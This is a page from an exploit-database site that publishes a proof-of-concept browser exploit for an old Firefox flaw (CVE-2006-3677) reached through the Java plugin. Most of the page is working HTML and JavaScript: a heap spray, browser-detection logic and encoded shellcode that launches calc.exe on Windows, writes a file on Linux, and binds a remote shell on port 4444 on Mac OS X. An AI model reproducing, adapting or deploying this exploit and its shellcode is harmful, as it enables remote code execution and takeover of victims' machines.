0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC
[=========================================================================
Mozilla Firefox <= 1.5.0.4 Javascript Navigator Object Code Execution PoC
=========================================================================
<!--
Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC
http://browserfun.blogspot.com/
The following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running
on Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system.
This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of
Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is
trivial to turn into a working exploit. The demonstration link below will attempt
to launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems.
window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);
-->
<html><body><script>
// MoBB Demonstration
function Demo() {
// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
// CVE-2006-3677
// The Java plugin is required for this to work
// win32 = calc.exe
var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
var fill_win32 = unescape('%u0800');
var addr_win32 = 0x08000800;
// linux = touch /tmp/METASPLOIT (unreliable)
var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
var fill_linux = unescape('%ua8a8');
var addr_linux = -0x58000000; // Integer wrap: 0xa8000000
// mac os x ppc = bind a shell to 4444
var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
var fill_macppc = unescape('%u0c0c');
var addr_macppc = 0x0c000000;
// mac os x intel = bind a shell to 4444
// Thanks to nemo[at]felinemenace.org for shellcode
// Thanks to Todd Manning for the target information and testing
var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
var fill_macx86 = unescape('%u1c1c');
var addr_macx86 = 0x1c000000;
// Start the browser detection
var shellcode;
var addr;
var fill;
var ua = '' + navigator.userAgent;
if (ua.indexOf('Linux') != -1) {
alert('Trying to create /tmp/METASPLOIT');
shellcode = shellcode_linux;
addr = addr_linux;
fill = fill_linux;
}
if (ua.indexOf('Windows') != -1) {
alert('Trying to launch Calculator');
shellcode = shellcode_win32;
addr = addr_win32;
fill = fill_win32;
}
if (ua.indexOf('PPC Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macppc;
addr = addr_macppc;
fill = fill_macppc;
}
if (ua.indexOf('Intel Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macx86;
addr = addr_macx86;
fill = fill_macx86;
}
if (! shellcode) {
alert('OS not supported, only attempting a crash!');
shellcode = unescape('%ucccc');
fill = unescape('%ucccc');
addr = 0x02020202;
}
var b = fill;
while (b.length <= 0x400000) b+=b;
var c = new Array();
for (var i =0; i<36; i++) {
c[i] =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}
if (window.navigator.javaEnabled) {
window.navigator = (addr / 2);
try {
java.lang.reflect.Runtime.newInstance(
java.lang.Class.forName("java.lang.Runtime"), 0
);
alert('Patched!');
}catch(e){
alert('No Java plugin installed!');
}
}
}
</script>
Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>
</body></html>
# 0day.today [2024-11-16] #